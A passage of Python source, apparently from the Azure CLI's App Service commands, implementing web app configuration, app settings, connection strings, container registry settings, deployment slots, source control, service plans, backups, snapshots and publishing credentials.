http20_enabled=None, # pylint: disable=unused-argument
app_command_line=None, # pylint: disable=unused-argument
ftps_state=None, # pylint: disable=unused-argument
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if reserved_instance_count is not None:
reserved_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', reserved_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['reserved_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise CLIError('Windows containers is not yet supported in app service environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_request = BackupRequest(backup_request_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(frequency):
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
from azure.cli.core.profiles import ResourceType
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
from azure.cli.core.profiles import ResourceType
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
